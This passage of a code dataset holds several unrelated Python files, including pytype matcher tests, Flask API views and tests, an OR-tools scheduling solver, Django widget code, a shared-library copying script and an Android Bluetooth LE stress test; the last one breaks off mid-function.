Tuple, Type\\n\"\n src += \"x = ... 
# type: \" + t\n filename = str(hash((t, as_instance)))\n x = self._parse_and_lookup(src, \"x\", filename).type\n if as_instance:\n x = abstract.AsInstance(x)\n return self.vm.convert.constant_to_value(\"\", x, {}, self.vm.root_cfg_node)\n\n def _match_var(self, left, right):\n var = self.vm.program.NewVariable()\n var.AddBinding(left, [], self.vm.root_cfg_node)\n for view in abstract.get_views([var], self.vm.root_cfg_node):\n yield self.vm.matcher.match_var_against_type(\n var, right, {}, self.vm.root_cfg_node, view)\n\n def assertMatch(self, left, right):\n for match in self._match_var(left, right):\n self.assertEquals(match, {})\n\n def assertNoMatch(self, left, right):\n for match in self._match_var(left, right):\n self.assertIsNone(match)\n\n def testBasic(self):\n self.assertMatch(abstract.Empty(self.vm), abstract.Nothing(self.vm))\n\n def testType(self):\n left = self._make_class(\"dummy\")\n type_parameters = {abstract.T: abstract.TypeParameter(abstract.T, self.vm)}\n other_type = abstract.ParameterizedClass(\n self.type_type, type_parameters, self.vm)\n for result in self._match_var(left, other_type):\n instance_binding, = result[abstract.T].bindings\n cls_binding, = instance_binding.data.cls.bindings\n self.assertEquals(cls_binding.data, left)\n\n def testUnion(self):\n left_option1 = self._make_class(\"o1\")\n left_option2 = self._make_class(\"o2\")\n left = abstract.Union([left_option1, left_option2], self.vm)\n self.assertMatch(left, self.type_type)\n\n def testMetaclass(self):\n left = self._make_class(\"left\")\n meta1 = self._make_class(\"m1\")\n meta2 = self._make_class(\"m2\")\n left.cls = self.vm.program.NewVariable(\n [meta1, meta2], [], self.vm.root_cfg_node)\n self.assertMatch(left, meta1)\n self.assertMatch(left, meta2)\n\n def testEmptyAgainstClass(self):\n var = self.vm.program.NewVariable()\n right = self._make_class(\"bar\")\n result = self.vm.matcher.match_var_against_type(\n var, right, {}, self.vm.root_cfg_node, {})\n self.assertEquals(result, {})\n\n def testEmptyAgainstNothing(self):\n var = self.vm.program.NewVariable()\n right = abstract.Nothing(self.vm)\n result = self.vm.matcher.match_var_against_type(\n var, right, {}, self.vm.root_cfg_node, {})\n self.assertEquals(result, {})\n\n def testEmptyAgainstTypeParameter(self):\n var = self.vm.program.NewVariable()\n right = abstract.TypeParameter(\"T\", self.vm)\n result = self.vm.matcher.match_var_against_type(\n var, right, {}, self.vm.root_cfg_node, {})\n self.assertItemsEqual(result, [\"T\"])\n self.assertFalse(result[\"T\"].bindings)\n\n def testEmptyAgainstUnsolvable(self):\n var = self.vm.program.NewVariable()\n right = abstract.Empty(self.vm)\n result = self.vm.matcher.match_var_against_type(\n var, right, {}, self.vm.root_cfg_node, {})\n self.assertEquals(result, {})\n\n def testClassAgainstTypeUnion(self):\n left = self._make_class(\"foo\")\n union = abstract.Union((left,), self.vm)\n right = abstract.ParameterizedClass(self.type_type, {\"T\": union}, self.vm)\n self.assertMatch(left, right)\n\n def testNoneAgainstBool(self):\n # See pep484.COMPAT_MAP.\n left = self._convert(\"None\", as_instance=True)\n right = self._convert(\"bool\", as_instance=False)\n self.assertMatch(left, right)\n\n def testHomogeneousTuple(self):\n left = self._convert(\"Tuple[int, ...]\", as_instance=True)\n right1 = self._convert(\"Tuple[int, ...]\", as_instance=False)\n right2 = self._convert(\"Tuple[str, ...]\", as_instance=False)\n self.assertMatch(left, right1)\n self.assertNoMatch(left, right2)\n\n def 
testHeterogeneousTuple(self):\n left1 = self._convert(\"Tuple[int or str]\", as_instance=True)\n left2 = self._convert(\"Tuple[int, str]\", as_instance=True)\n left3 = self._convert(\"Tuple[str, int]\", as_instance=True)\n right = self._convert(\"Tuple[int, str]\", as_instance=False)\n self.assertNoMatch(left1, right)\n self.assertMatch(left2, right)\n self.assertNoMatch(left3, right)\n\n def testHeterogeneousTupleAgainstHomogeneousTuple(self):\n left = self._convert(\"Tuple[bool, int]\", as_instance=True)\n right1 = self._convert(\"Tuple[bool, ...]\", as_instance=False)\n right2 = self._convert(\"Tuple[int, ...]\", as_instance=False)\n right3 = self._convert(\"tuple\", as_instance=False)\n self.assertNoMatch(left, right1)\n self.assertMatch(left, right2)\n self.assertMatch(left, right3)\n\n def testHomogeneousTupleAgainstHeterogeneousTuple(self):\n left1 = self._convert(\"Tuple[bool, ...]\", as_instance=True)\n left2 = self._convert(\"Tuple[int, ...]\", as_instance=True)\n left3 = self._convert(\"tuple\", as_instance=True)\n right = self._convert(\"Tuple[bool, int]\", as_instance=False)\n self.assertMatch(left1, right)\n self.assertNoMatch(left2, right)\n self.assertMatch(left3, right)\n\n def testTupleType(self):\n # homogeneous against homogeneous\n left = self._convert(\"Type[Tuple[float, ...]]\", as_instance=True)\n right1 = self._convert(\"Type[Tuple[float, ...]]\", as_instance=False)\n right2 = self._convert(\"Type[Tuple[str, ...]]\", as_instance=False)\n self.assertMatch(left, right1)\n self.assertNoMatch(left, right2)\n\n # heterogeneous against heterogeneous\n left1 = self._convert(\"Type[Tuple[int or str]]\", as_instance=True)\n left2 = self._convert(\"Type[Tuple[int, str]]\", as_instance=True)\n left3 = self._convert(\"Type[Tuple[str, int]]\", as_instance=True)\n right = self._convert(\"Type[Tuple[int, str]]\", as_instance=False)\n self.assertNoMatch(left1, right)\n self.assertMatch(left2, right)\n self.assertNoMatch(left3, right)\n\n # heterogeneous against homogeneous\n left = self._convert(\"Type[Tuple[bool, int]]\", as_instance=True)\n right1 = self._convert(\"Type[Tuple[bool, ...]]\", as_instance=False)\n right2 = self._convert(\"Type[Tuple[int, ...]]\", as_instance=False)\n right3 = self._convert(\"Type[tuple]\", as_instance=False)\n self.assertNoMatch(left, right1)\n self.assertMatch(left, right2)\n self.assertMatch(left, right3)\n\n # homogeneous against heterogeneous\n left1 = self._convert(\"Type[Tuple[bool, ...]]\", as_instance=True)\n left2 = self._convert(\"Type[Tuple[int, ...]]\", as_instance=True)\n left3 = self._convert(\"Type[tuple]\", as_instance=True)\n right = self._convert(\"Type[Tuple[bool, int]]\", as_instance=False)\n self.assertMatch(left1, right)\n self.assertNoMatch(left2, right)\n self.assertMatch(left3, right)\n\n def testTupleSubclass(self):\n subclass = self._parse_and_lookup(\"\"\"\n from typing import Tuple\n class A(Tuple[bool, int]): ...\"\"\", \"A\")\n left = self.vm.convert.constant_to_value(\n \"\", abstract.AsInstance(subclass), {}, self.vm.root_cfg_node)\n right1 = self._convert(\"Tuple[bool, int]\", as_instance=False)\n right2 = self._convert(\"Tuple[int, bool]\", as_instance=False)\n right3 = self._convert(\"Tuple[int, int]\", as_instance=False)\n right4 = self._convert(\"Tuple[int]\", as_instance=False)\n right5 = self._convert(\"tuple\", as_instance=False)\n right6 = self._convert(\"Tuple[bool, ...]\", as_instance=False)\n right7 = self._convert(\"Tuple[int, ...]\", as_instance=False)\n self.assertMatch(left, right1)\n 
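# bool is a subclass of int but not vice versa, so the [int, bool] ordering must not match while the [int, int] widening does\n 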
self.assertNoMatch(left, right2)\n self.assertMatch(left, right3)\n self.assertNoMatch(left, right4)\n self.assertMatch(left, right5)\n self.assertNoMatch(left, right6)\n self.assertMatch(left, right7)\n\n def testAnnotationClass(self):\n left = abstract.AnnotationClass(\"Dict\", self.vm)\n right = self.vm.convert.object_type.data[0]\n self.assertMatch(left, right)\n\n def testEmptyTupleClass(self):\n var = self.vm.program.NewVariable()\n params = {0: abstract.TypeParameter(abstract.K, self.vm),\n 1: abstract.TypeParameter(abstract.V, self.vm)}\n params[abstract.T] = abstract.Union((params[0], params[1]), self.vm)\n right = abstract.TupleClass(\n self.vm.convert.tuple_type.data[0], params, self.vm)\n match = self.vm.matcher.match_var_against_type(\n var, right, {}, self.vm.root_cfg_node, {})\n self.assertSetEqual(set(match), {abstract.K, abstract.V})\n\n def testUnsolvableAgainstTupleClass(self):\n left = self.vm.convert.unsolvable\n params = {0: abstract.TypeParameter(abstract.K, self.vm),\n 1: abstract.TypeParameter(abstract.V, self.vm)}\n params[abstract.T] = abstract.Union((params[0], params[1]), self.vm)\n right = abstract.TupleClass(\n self.vm.convert.tuple_type.data[0], params, self.vm)\n for match in self._match_var(left, right):\n self.assertSetEqual(set(match), {abstract.K, abstract.V})\n self.assertEquals(match[abstract.K].data, [self.vm.convert.unsolvable])\n self.assertEquals(match[abstract.V].data, [self.vm.convert.unsolvable])\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"pytype/matcher_test.py","file_name":"matcher_test.py","file_ext":"py","file_size_in_byte":10228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"292840672","text":"#!/usr/bin/python3\n\"\"\"DUMMY DOX\"\"\"\nfrom flask import jsonify, request, abort\nfrom api.v1.views import app_views\n\n\n@app_views.route('/amenities/', methods=['GET', 'DELETE', 'PUT'],\n strict_slashes=False)\n@app_views.route('/amenities', methods=['GET', 'POST'], strict_slashes=False)\ndef manipulate_amenity(amenity_id=None):\n '''Retrieves, deletes, creates, and updates an Amenity object'''\n from models import storage\n from models.amenity import Amenity\n method = request.method\n if method == 'GET':\n if amenity_id is None:\n amenities = storage.all(Amenity).values()\n return jsonify([amenity.to_dict() for amenity in amenities])\n elif storage.get(Amenity, amenity_id) is None:\n abort(404)\n else:\n return jsonify(storage.get(Amenity, amenity_id).to_dict())\n elif method == 'DELETE':\n if amenity_id is None or storage.get(Amenity, amenity_id) is None:\n abort(404)\n else:\n storage.delete(storage.get(Amenity, amenity_id))\n storage.save()\n return jsonify({})\n elif method == 'POST':\n if request.is_json:\n jsn = request.get_json()\n if 'name' in jsn.keys():\n amenity = Amenity(**jsn)\n amenity.save()\n return jsonify(amenity.to_dict()), 201\n else:\n abort(400, 'Missing name')\n else:\n abort(400, 'Not a JSON')\n elif method == 'PUT':\n amenity = storage.get(Amenity, amenity_id)\n if amenity_id is None or amenity is None:\n abort(404)\n if request.is_json:\n jsn = request.get_json()\n for key, val in jsn.items():\n if key not in [\"id\", \"created_at\", \"updated_at\"]:\n setattr(amenity, key, val)\n amenity.save()\n return jsonify(amenity.to_dict())\n else:\n abort(400, 'Not a 
JSON')\n","sub_path":"api/v1/views/amenities.py","file_name":"amenities.py","file_ext":"py","file_size_in_byte":1983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"142949157","text":"from ortools.constraint_solver import pywrapcp\nfrom pathlib import Path\n\n\nclass RPQ( ) :\n def __init__ (self,r,p,q):\n self.R = r\n self.P = p\n self.Q = q\n\n\ndef cpApp( jobs , instanceName ):\n\n variablesMaxValue = 0\n for i in range (len(jobs)):\n variablesMaxValue += (jobs[ i ].R+jobs[ i ].P+jobs[ i ].Q)\n parameters = pywrapcp.Solver.DefaultSolverParameters()\n solver = pywrapcp.Solver('simple_CP', parameters)\n #variables:\n alfasMatrix = { } # attention! dictionary - not a list!\n for i in range ( len( jobs ) ) :\n for j in range ( len ( jobs ) ) :\n alfasMatrix[ i , j ] = solver.IntVar( 0 , 1 , \"alfa\"+str( i )+ \"_\"+str( j ) )\n starts = [ ]\n for i in range ( len ( jobs ) ) :\n starts.append( solver.IntVar ( 0 , variablesMaxValue , \"starts\"+ str( i ) ) )\n cmax = solver.IntVar ( 0 , variablesMaxValue , \"cmax\" )\n# constraints:\n for i in range ( len ( jobs ) ) :\n solver.Add( starts[ i ]>=jobs[ i ] . R)\n solver.Add(cmax>= starts[ i ] + jobs [ i ].P+jobs [ i ] .Q)\n for i in range ( len ( jobs ) ) :\n for j in range ( i +1 ,len ( jobs ) ) :\n solver.Add( starts[ i ]+ jobs [ i ].P <= starts[ j ] + alfasMatrix [ i , j ] * variablesMaxValue )\n solver.Add( starts [ j ]+ jobs [ j ].P <= starts [ i ] + alfasMatrix [ j , i ] * variablesMaxValue )\n solver.Add( alfasMatrix [ i , j ] + alfasMatrix [ j , i ] == 1 )\n\n# solver:\n objective = solver.Minimize(cmax, 1)\n decision_builder = solver.Phase([cmax],\n solver.CHOOSE_FIRST_UNBOUND,\n solver.ASSIGN_MIN_VALUE)\n collector = solver.LastSolutionCollector()\n \"\"\"#1\n Test\n \"\"\"#1\n # Add the decision variables.\n for i in starts:\n collector.Add(i)\n #collector.Add(cmax)\n \"\"\"#2\n for i in range ( len ( jobs ) ) :\n for j in range ( i +1 ,len ( jobs ) ) :\n collector.Add( starts[ i ]+ jobs [ i ].P <= starts[ j ] + alfasMatrix [ i , j ] * variablesMaxValue )\n collector.Add( starts [ j ]+ jobs [ j ].P <= starts [ i ] + alfasMatrix [ j , i ] * variablesMaxValue )\n collector.Add( alfasMatrix [ i , j ] + alfasMatrix [ j , i ] == 1 )\n \"\"\" #2\n\n collector.AddObjective(cmax)\n solver.Solve(decision_builder, [objective, collector])\n if collector.SolutionCount() > 0:\n best_solution = collector.SolutionCount() - 1\n \"\"\"#2\n collector.ObjectiveValue(best_solution) works fine\n \"\"\"#2\n print(instanceName , \"Cmax: \", collector.ObjectiveValue(best_solution))\n \"\"\"\n pi = [ ]\n for i in range ( len ( starts) ):\n pi.append ( collector.Value(best_solution, starts[i]) )\n #pi.sort ( key=lambda x : x [ 1 ] )\n \"\"\"\n\n pi = []\n for i in range ( len ( starts) ):\n pi.append ( ( i , collector.Value(best_solution, starts[i]) ) )\n pi.sort ( key=lambda x : x [ 1 ] )\n print(pi)\n #pi.sort ( key=lambda x : x [ 1 ] )\n #collector.Value(best_solution, starts[i])\n #print(collector)\n\n\n\n\n ########## ########## ########## ########## ########## ########## ########## ########## ########## ##########\ndef GetRPQsFromFile ( pathToFile ):\n fullTextFromFile = Path (pathToFile).read_text ( )\n words = fullTextFromFile.replace ( \"\\n\" , \" \" ).split ( \" \" )\n words_cleaned = list ( filter (None, words ) )\n numbers = list (map( int , words_cleaned ) )\n numberOfJobs = numbers [ 0 ]\n numbers.pop ( 0 )\n numbers.pop ( 0 )\n jobs = [ ]\n\n for i in 
range ( numberOfJobs ) :\n jobs.append (RPQ(numbers [ 0 ] , numbers [ 1 ] , numbers [ 2 ] ) )\n numbers.pop ( 0 )\n numbers.pop ( 0 )\n numbers.pop ( 0 )\n return jobs\n\n\nif __name__ == '__main__' :\n file_paths = [ \"in50.txt \" ]\n for i in range ( len ( file_paths ) ) :\n jobs = GetRPQsFromFile(file_paths[ i ] )\n cpApp( jobs , file_paths[ i ] )\n","sub_path":"RPQCp.py","file_name":"RPQCp.py","file_ext":"py","file_size_in_byte":4044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"556070206","text":"'''\nCreated on 22/05/2013\n\n@author: amucci\n'''\nfrom admin.utils.views.generic import AdminWidgetTemplateFormView\nfrom admin.widgets.engine.forms import WidgetsHtmlAddForm\nfrom admin.widgets.engine.models import WidgetHtml\nfrom engine.models import InstalledWidgets\nclass Admin_Widgets_Engine_HtmlController(AdminWidgetTemplateFormView):\n\n template_name = \"menu/add.html\"\n form_class = WidgetsHtmlAddForm\n \n \n def get_widget_initial(self):\n q = WidgetHtml.all()\n q.filter(\"installed_widget =\", InstalledWidgets.get_by_id(int(self.request.GET.get('id'))))\n result = q.get()\n if result is not None:\n return {'body': result.body}\n else:\n return {}\n \n def form_valid(self, form):\n widget_html = WidgetHtml.all().filter(\"installed_widget =\", InstalledWidgets.get_by_id(int(self.request.GET.get('id')))).get()\n if widget_html is not None:\n widget_html.body = form.cleaned_data['body']\n widget_html.installed_widget = InstalledWidgets.get_by_id(int(self.request.GET.get('id')))\n else:\n widget_html = WidgetHtml(installed_widget=InstalledWidgets.get_by_id(int(self.request.GET.get('id'))), body=form.cleaned_data['body'])\n widget_html.put()\n return super(Admin_Widgets_Engine_HtmlController, self).form_valid(form)","sub_path":"admin/widgets/engine/html.py","file_name":"html.py","file_ext":"py","file_size_in_byte":1354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"298309105","text":"import json\nimport unittest\n\nfrom models import User\nfrom models.abc import db\nfrom repositories import UserRepository\nfrom server import server\n\n\nclass TestUser(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n cls.client = server.test_client()\n\n def setUp(self):\n db.create_all()\n\n def tearDown(self):\n db.session.remove()\n db.drop_all()\n\n def test_get(self):\n \"\"\" The GET on `/user` should return an user \"\"\"\n user = UserRepository.create(first_name=\"John\", last_name=\"Doe\",\n emails=[\"popovvasile@gmail.com\"],\n phone_numbers=[\"+491424324435\"])\n response = self.client.get(\"/application/user/{}\".format(user.id))\n\n self.assertEqual(response.status_code, 200)\n response_json = json.loads(response.data.decode(\"utf-8\"))\n self.assertEqual(\n response_json,\n {\"user\": dict(user_id=user.id,\n first_name=\"John\", last_name=\"Doe\",\n emails=[\"popovvasile@gmail.com\"],\n phone_numbers=[\"+491424324435\"])},\n )\n\n def test_create(self):\n \"\"\" The POST on `/user` should create an user \"\"\"\n response = self.client.post(\n \"/application/user/Doe/John\",\n content_type=\"application/json\",\n data=json.dumps(dict(\n first_name=\"John\", last_name=\"Doe\",\n emails=[\"popovvasile@gmail.com\"],\n phone_numbers=[\"+491424324435\"])),\n )\n\n self.assertEqual(response.status_code, 200)\n response_json = json.loads(response.data.decode(\"utf-8\"))\n self.assertEqual(\n response_json,\n {\"user\": 
dict(user_id=response_json[\"user\"][\"user_id\"],\n first_name=\"John\", last_name=\"Doe\",\n emails=[\"popovvasile@gmail.com\"],\n phone_numbers=[\"+491424324435\"])},\n )\n self.assertEqual(User.query.count(), 1)\n\n def test_update(self):\n \"\"\" The PUT on `/user` should update an user's info\"\"\"\n user = UserRepository.create(first_name=\"John\", last_name=\"Doe\")\n response = self.client.put(\n \"/application/user/{}\".format(user.id),\n content_type=\"application/json\",\n data=json.dumps(dict(\n first_name=\"John\", last_name=\"Doe\",\n emails=[\"popovvasile@gmail.com\"],\n phone_numbers=[\"+491424324435\"])),\n )\n\n self.assertEqual(response.status_code, 200)\n response_json = json.loads(response.data.decode(\"utf-8\"))\n self.assertEqual(\n response_json,\n {\"user\": dict(user_id=user.id,\n first_name=\"John\", last_name=\"Doe\",\n emails=[\"popovvasile@gmail.com\"],\n phone_numbers=[\"+491424324435\"])},\n )\n user = UserRepository.get(user_id=user.id)\n self.assertEqual(user.first_name, \"John\")\n","sub_path":"test/test_user.py","file_name":"test_user.py","file_ext":"py","file_size_in_byte":3087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"57241549","text":"#/usr/bin/env python\n\nimport os\nfrom optparse import OptionParser\nfrom sys import platform as platform_\nimport string\n\nif __name__ == \"__main__\":\n\n\tparser = OptionParser()\n\tparser.add_option(\"-t\", \"--target\",\n\t\t\t\t\tdest=\"target\",\n\t\t\t\t\thelp=\"Path to target (REQUIRED).\")\n\tparser.add_option(\"-d\", \"--directory\",\n\t\t\t\t\tdest=\"directory\",\n\t\t\t\t\thelp=\"Output directory (REQUIRED).\")\n\tparser.add_option(\"-k\", \"--keyword\",\n\t\t\t\t\tdest=\"keyword\",\n\t\t\t\t\thelp=\"Only take dependencies with this keyword.\")\n\t(options, args) = parser.parse_args()\n\n\tif not options.target:\n\t\tparser.error(\"target not given.\")\n\tif not options.directory:\n\t\tparser.error(\"directory not given.\")\n\tif not options.keyword:\n\t\tkeyword = \"\"\n\telse:\n\t\tkeyword = options.keyword\n\n\n\tif platform_ == \"linux\" or platform_ == \"linux2\":\n\t\tdep = \"ldd\"\n\telse:\n\t\tdep = \"otool -L\"\n\n\tresult = os.popen(dep + \" \" + options.target).read()\n\tresult = string.split(result, \"\\n\")\n\n\tfor r in result:\n\n\t\tif platform_ == \"linux\" or platform_ == \"linux2\":\n\t\t\ta = r.find(\">\") + 2\n\t\t\tb = r.find(\"(\") - 1\n\t\telse:\n\t\t\ta = r.find(\"/\")\n\t\t\tb = r.find(\"(\") - 1\n\n\t\tif a < 0 or b < 0:\n\t\t\tcontinue\n\n\t\tdep_name = r[a:b]\n\t\t\n\t\tif dep_name.find(keyword) != -1:\n\t\t\tos.system(\"cp \" + dep_name + \" \" + options.directory)\n\n\n\n","sub_path":"GrabLibs.py","file_name":"GrabLibs.py","file_ext":"py","file_size_in_byte":1235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"150303103","text":"import ael, datetime\n\np_list = []\nfor p in ael.Price.select('day = \"2009-06-26\"'):\n if p.ptynbr.ptyid == 'internal':\n #if p.insaddr.insid == 'ZAR/SHP':\n tup = (p.prinbr, p.day)\n p_list.append(tup)\n \n\nfor l in p_list:\n x = l[0]\n new_p = ael.Price[x].new()\n new_p.day = l[1].add_days(2)\n try:\n new_p.commit()\n except:\n print('cannot commit price for ', new_p.insaddr.insid)\n\n\n\n\n\n","sub_path":"Python modules/as_update_internal_prices2.py","file_name":"as_update_internal_prices2.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} 
+{"seq_id":"60404436","text":"#encoding: UTF-8\n\n# Author: Leonardo Castillejos Vite A01375332\n# Description: A program that, given the number of men and women, reports the total number of students and the percentage of men and women in the class\n# Write your program from here on\n\nmujeresins = int(input(\"Enter the number of female students enrolled \"))\nhombresins = int(input(\"Enter the number of male students enrolled \"))\ntotalins = mujeresins + hombresins\nporcenm = (mujeresins / totalins)*100\nporcenh = (hombresins / totalins)*100\nprint(\"Total students\", totalins)\nprint(\"Percentage of men \", porcenh, \"%\", sep=\"\")\nprint(\"Percentage of women \", porcenm, \"%\", sep=\"\")","sub_path":"porcentajes.py","file_name":"porcentajes.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"220046452","text":"#!/usr/bin/env python\n# _*_ coding: utf-8 _*_\n# @Author: MatthewP\n# @Date: 12/3/2018\n# @Email: matthewhakka@gmail.com\n\nimport requests\n\nr = requests.get('https://github.com/requests/requests/')\nfor key, value in r.cookies.items():\n print(key + '=' + value)","sub_path":"spyde/requests/cookies.py","file_name":"cookies.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"363590375","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('shop', '0024_auto_20150820_0156'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='order',\n name='is_paid_manually',\n field=models.BooleanField(default=False, verbose_name='paid manually'),\n ),\n migrations.AddField(\n model_name='order',\n name='is_paid_total',\n field=models.NullBooleanField(editable=False, verbose_name='prepaid'),\n ),\n migrations.AlterField(\n model_name='order',\n name='is_paid',\n field=models.NullBooleanField(editable=False, verbose_name='paid automatically'),\n ),\n ]\n","sub_path":"shop/migrations/0025_auto_20150909_2236.py","file_name":"0025_auto_20150909_2236.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"142360911","text":"#!/usr/bin/env python3.4\n#\n# Copyright (C) 2016 The Android Open Source Project\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may not\n# use this file except in compliance with the License. You may obtain a copy of\n# the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the\n# License for the specific language governing permissions and limitations under\n# the License.\n\"\"\"\nOnLost onFound Stress Test.\n\"\"\"\n\nimport threading\nimport time\n\nfrom queue import Empty\nfrom acts.test_utils.bt.BluetoothBaseTest import BluetoothBaseTest\nfrom acts.test_utils.bt.BleEnum import AdvertiseSettingsAdvertiseMode\nfrom acts.test_utils.bt.BleEnum import ScanSettingsCallbackType\nfrom acts.test_utils.bt.BleEnum import ScanSettingsScanMode\nfrom acts.test_utils.bt.BleEnum import ScanSettingsMatchMode\nfrom acts.test_utils.bt.BleEnum import ScanSettingsMatchNum\nfrom acts.test_utils.bt.bt_test_utils import cleanup_scanners_and_advertisers\nfrom acts.test_utils.bt.bt_test_utils import get_advanced_droid_list\nfrom acts.test_utils.bt.bt_gatt_utils import orchestrate_gatt_connection\nfrom acts.test_utils.bt.bt_test_utils import reset_bluetooth\nfrom acts.test_utils.bt.bt_gatt_utils import run_continuous_write_descriptor\nfrom acts.test_utils.bt.bt_gatt_utils import setup_multiple_services\n\n\nclass BleOnLostOnFoundStressTest(BluetoothBaseTest):\n default_timeout = 10\n max_scan_instances = 28\n report_delay = 2000\n active_scan_callback_list = []\n active_adv_callback_list = []\n scan_result = \"BleScan{}onScanResults\"\n batch_scan_result = \"BleScan{}onBatchScanResult\"\n\n def __init__(self, controllers):\n BluetoothBaseTest.__init__(self, controllers)\n self.droid_list = get_advanced_droid_list(self.android_devices)\n self.scn_ad = self.android_devices[0]\n self.adv_ad = self.android_devices[1]\n if self.droid_list[1]['max_advertisements'] == 0:\n self.tests = ()\n return\n\n def teardown_test(self):\n cleanup_scanners_and_advertisers(\n self.scn_ad, self.active_adv_callback_list, self.scn_ad,\n self.active_adv_callback_list)\n self.active_adv_callback_list = []\n self.active_scan_callback_list = []\n\n def on_exception(self, test_name, begin_time):\n reset_bluetooth(self.android_devices)\n\n def _start_generic_advertisement_include_device_name(self):\n self.adv_ad.droid.bleSetAdvertiseDataIncludeDeviceName(True)\n self.adv_ad.droid.bleSetAdvertiseSettingsAdvertiseMode(\n AdvertiseSettingsAdvertiseMode.ADVERTISE_MODE_LOW_LATENCY.value)\n advertise_data = self.adv_ad.droid.bleBuildAdvertiseData()\n advertise_settings = self.adv_ad.droid.bleBuildAdvertiseSettings()\n advertise_callback = self.adv_ad.droid.bleGenBleAdvertiseCallback()\n self.adv_ad.droid.bleStartBleAdvertising(\n advertise_callback, advertise_data, advertise_settings)\n self.adv_ad.ed.pop_event(\n \"BleAdvertise{}onSuccess\".format(advertise_callback),\n self.default_timeout)\n self.active_adv_callback_list.append(advertise_callback)\n return advertise_callback\n\n def _verify_no_events_found(self, event_name):\n try:\n self.scn_ad.ed.pop_event(event_name, self.default_timeout)\n self.log.error(\"Found an event when none was expected.\")\n return False\n except Empty:\n self.log.info(\"No scan result found as expected.\")\n return True\n\n def _poll_energy(self):\n import random\n while True:\n self.log.debug(\n self.scn_ad.droid.bluetoothGetControllerActivityEnergyInfo(1))\n time.sleep(2)\n\n @BluetoothBaseTest.bt_test_wrap\n def test_on_star_while_polling_energy_stats(self):\n \"\"\"\n Tests ...\n Steps\n 1: ...\n :return: boolean\n \"\"\"\n thread = threading.Thread(target=self._poll_energy)\n thread.start()\n\n filter_list = self.scn_ad.droid.bleGenFilterList()\n self.scn_ad.droid.bleSetScanFilterDeviceName(\n self.adv_ad.droid.bluetoothGetLocalName())\n 
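# SCAN_MODE_LOW_LATENCY favors detection speed over battery, suiting this onFound/onLost stress run\n 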
self.scn_ad.droid.bleSetScanSettingsScanMode(\n ScanSettingsScanMode.SCAN_MODE_LOW_LATENCY.value)\n self.scn_ad.droid.bleSetScanSettingsCallbackType(\n ScanSettingsCallbackType.CALLBACK_TYPE_FOUND_AND_LOST.value)\n self.scn_ad.droid.bleSetScanSettingsMatchMode(\n ScanSettingsMatchMode.AGGRESIVE.value)\n self.scn_ad.droid.bleSetScanSettingsNumOfMatches(\n ScanSettingsMatchNum.MATCH_NUM_ONE_ADVERTISEMENT.value)\n scan_settings = self.scn_ad.droid.bleBuildScanSetting()\n scan_callback = self.scn_ad.droid.bleGenScanCallback()\n self.scn_ad.droid.bleBuildScanFilter(filter_list)\n self.scn_ad.droid.bleStartBleScan(filter_list, scan_settings,\n scan_callback)\n self.active_scan_callback_list.append(scan_callback)\n on_found_count = 0\n on_lost_count = 0\n from contextlib import suppress\n for x in range(1000):\n adv_callback = (\n self._start_generic_advertisement_include_device_name())\n with suppress(Exception):\n event = self.scn_ad.ed.pop_event(\n self.scan_result.format(scan_callback),\n self.default_timeout * 3)\n if event['data']['CallbackType'] == 2:\n on_found_count += 1\n elif event['data']['CallbackType'] == 4:\n on_lost_count += 1\n self.adv_ad.droid.bleStopBleAdvertising(adv_callback)\n with suppress(Exception):\n event2 = self.scn_ad.ed.pop_event(\n self.scan_result.format(scan_callback),\n self.default_timeout * 4)\n if event2['data']['CallbackType'] == 2:\n on_found_count += 1\n elif event2['data']['CallbackType'] == 4:\n on_lost_count += 1\n thread.join()\n return True\n\n @BluetoothBaseTest.bt_test_wrap\n def test_more_stress_test(self):\n gatt_server_callback, gatt_server = setup_multiple_services(\n self.adv_ad)\n bluetooth_gatt, gatt_callback, adv_callback = (\n orchestrate_gatt_connection(self.scn_ad, self.adv_ad))\n self.active_scan_callback_list.append(adv_callback)\n if self.scn_ad.droid.gattClientDiscoverServices(bluetooth_gatt):\n event = self.scn_ad.ed.pop_event(\n \"GattConnect{}onServicesDiscovered\".format(bluetooth_gatt),\n self.default_timeout)\n discovered_services_index = event['data']['ServicesIndex']\n else:\n self.log.info(\"Failed to discover services.\")\n return False\n services_count = self.scn_ad.droid.gattClientGetDiscoveredServicesCount(\n discovered_services_index)\n thread = threading.Thread(\n target=run_continuous_write_descriptor,\n args=(self.scn_ad.droid, self.scn_ad.ed, self.adv_ad.droid,\n self.adv_ad.ed, gatt_server, gatt_server_callback,\n bluetooth_gatt, services_count, discovered_services_index))\n thread.start()\n thread2 = threading.Thread(target=self._poll_energy)\n thread2.start()\n\n filter_list = self.scn_ad.droid.bleGenFilterList()\n self.scn_ad.droid.bleSetScanFilterDeviceName(\n self.adv_ad.droid.bluetoothGetLocalName())\n self.scn_ad.droid.bleSetScanSettingsScanMode(\n ScanSettingsScanMode.SCAN_MODE_LOW_LATENCY.value)\n 